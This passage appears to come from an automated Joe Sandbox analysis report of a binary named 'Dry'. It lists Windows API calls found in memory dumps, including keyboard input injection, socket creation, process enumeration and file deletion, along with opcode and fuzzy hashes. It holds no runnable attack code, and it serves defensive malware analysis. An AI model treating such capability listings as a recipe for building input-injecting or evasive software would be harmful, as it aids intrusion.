                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                    • Opcode ID: f2788d2a0a5eb367fea3e2bbd5b9dfdf9fc9d2a4c7033e7848b78352fdffe333
                                                                                                                                                                                                                                                                                    • Instruction ID: 03b68db116d6b40024319db992c05f42a8a94d27be0f152858559fa1d64a65bb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2788d2a0a5eb367fea3e2bbd5b9dfdf9fc9d2a4c7033e7848b78352fdffe333
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B411E371240248BEEF215F65DC06FAB37ECEF85B65F114524FA69E20A0C771DC619B10
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B436F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B43712
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B436F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B43723
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B436F4: GetCurrentThreadId.KERNEL32 ref: 00B4372A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B436F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B43731
                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00B438C4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4373B: GetParent.USER32(00000000), ref: 00B43746
                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00B4390F
                                                                                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,00B43987), ref: 00B43937
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                    • String ID: %s%d
                                                                                                                                                                                                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                    • Opcode ID: 2be9c89aa03661bdfd5a1c4e87af033b845442a68ece4ab81e215ff19bc72f96
                                                                                                                                                                                                                                                                                    • Instruction ID: 7720d76c6afbc31d488fc8d5e0355a88a114bc740510052aa2a677b30561f32c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2be9c89aa03661bdfd5a1c4e87af033b845442a68ece4ab81e215ff19bc72f96
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D11D571600209ABCF01BF748D85AED77E99F94740F0880A9BD0D9B292DF719A45EB30
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B76360
                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B7638D
                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 00B7639C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: 6cf8b2223d3e5e73def79a42933f1445146c471410e2a5a99d782c336afde4c8
                                                                                                                                                                                                                                                                                    • Instruction ID: 0d0d694c6cbc88f217e031726fb8f5f4d71e2837d08952a58a78c67fd2fdc6f6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cf8b2223d3e5e73def79a42933f1445146c471410e2a5a99d782c336afde4c8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70013531514218AFDB219F15D884BAA7BB4EF44351F10C0D9F84EEA190DB308A85EF21
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 3160838745455684e772aca81acd72c3603fed1fd04a3b07816f671e5b569e92
                                                                                                                                                                                                                                                                                    • Instruction ID: 40ec4452896d6f5adc2756260bca77badae3c39fb85f751f2fdac4c7c94a964b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3160838745455684e772aca81acd72c3603fed1fd04a3b07816f671e5b569e92
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BC14875A1021AEFDB04DFA4C894AAAB7F5FF48704F108598E605EB251D731EE81EB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                    • Instruction ID: c6d544a9c2124873fd6da491a3c9a794784fa3182284ed0ae8c567a17beaa709
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1A147729003869FEB21CF18D8917EEBBE4EF15310F6441E9E5959B381C73899C2C755
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B80BD4,?), ref: 00B40EE0
                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B80BD4,?), ref: 00B40EF8
                                                                                                                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00B7DCE0,000000FF,?,00000000,00000800,00000000,?,00B80BD4,?), ref: 00B40F1D
                                                                                                                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00B40F3E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 90e63fea606cbde9139752c8d3cff240cf368b64fe326803585f2ed126e9ed51
                                                                                                                                                                                                                                                                                    • Instruction ID: e22318da4bbd7a0f7be5d6421542c6f9f504feb7ea134d441ce3f37a46040312
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90e63fea606cbde9139752c8d3cff240cf368b64fe326803585f2ed126e9ed51
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A811B71A10109EFCB14DF94C984EEEB7F9FF89315F204598E606AB250DB71AE06DB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00B6B10C
                                                                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00B6B11A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00B6B1FC
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B6B20B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AFE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00B24D73,?), ref: 00AFE395
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c80f9d790e12997a94b95af97cf308e845f5c2d676d8f44815df78947185b9fc
                                                                                                                                                                                                                                                                                    • Instruction ID: 336e04fe9b5d71c34e63ac43d756909c5ad8e731cfe07d65dcb4374b44360162
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c80f9d790e12997a94b95af97cf308e845f5c2d676d8f44815df78947185b9fc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 265147B1908340AFC310EF25C986A6BBBF8FF89754F40496DF58997291EB70D905CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8d31ea5d410ed98808a597eac10feb16ea8c6504279aa6cc3c34a15fb0519d26
                                                                                                                                                                                                                                                                                    • Instruction ID: 602ed04405e88691185c3f0183efd5688064c334c9c53be489e3982c2af14d66
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d31ea5d410ed98808a597eac10feb16ea8c6504279aa6cc3c34a15fb0519d26
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63412B71A00121AADB306FBDACC2ABF3AE4EF61730F140AE5F41CDA2E1DB354D418261
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00B6255A
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B62568
                                                                                                                                                                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B625E7
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B625F1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ac83f18647a2a69e2d6f1e707907317478c2fef0cebe9982fbd0d35d2285ee2f
                                                                                                                                                                                                                                                                                    • Instruction ID: ea045ab2e8296402bda66bef139b43d03da90f857a41d6c496ab584e27c8a3fe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac83f18647a2a69e2d6f1e707907317478c2fef0cebe9982fbd0d35d2285ee2f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A041D334A00600AFE720AF24C996F2A77E5EF04758F54C488F91A8F2D2C776ED428B91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B76D1A
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00B76D4D
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00B76DBA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 96155a165f79a66ca1ed2452f73f8d32e19ce1c860e32c4b2157f862c19a5f58
                                                                                                                                                                                                                                                                                    • Instruction ID: 56b292be897b5132587e0963a0bddb1c220263004806b33f2b30b9e91f4971cc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96155a165f79a66ca1ed2452f73f8d32e19ce1c860e32c4b2157f862c19a5f58
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6510F74A00605EFCF25DF64D980AAE7BF6FF44360F1085A9F96997290DB70AE81CB50
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: dba0946c393416b4b4e9bf04a680ea4c9216e0d006a3e357098de72ef463c43b
                                                                                                                                                                                                                                                                                    • Instruction ID: 68743b9a95d722e1d98aca935bc9f6e835b7c6f5c61ddaece12b576a36b328f8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dba0946c393416b4b4e9bf04a680ea4c9216e0d006a3e357098de72ef463c43b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C741D771A00704EFD725AF78CC41FAA7BE9EB84B10F1086AAF115DB691D77299418780
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B561C8
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00B561EE
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B56213
                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B5623F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                    • Opcode ID: acbfd3b6c2b661c7aba33d4e589d773f232ac50e041fdb203159b842b524a888
                                                                                                                                                                                                                                                                                    • Instruction ID: 680e5589e855502d1a7145c4eee53898571277a9a40364f9fb610ba4703f8bda
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: acbfd3b6c2b661c7aba33d4e589d773f232ac50e041fdb203159b842b524a888
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB414A35600650DFCB10EF15C585A6ABBF2EF89310B188488EC4AAF362CB34FD45CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B4B473
                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 00B4B48F
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B4B4FD
                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B4B54F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 737a0a7df69db53d3d4f8fbe8feba23b04c6ba4ef363bea914bc0f9c867c0d4e
                                                                                                                                                                                                                                                                                    • Instruction ID: 433a155fe71f41d3eef2ccf3cbb093796c454a9e8857cda115fe98dfda4c245c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 737a0a7df69db53d3d4f8fbe8feba23b04c6ba4ef363bea914bc0f9c867c0d4e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB313770A402186EFF30CB248855FFABBF5EF59310F04429AE696962D2C774CB85A761
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B4B5B8
                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B4B5D4
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B4B63B
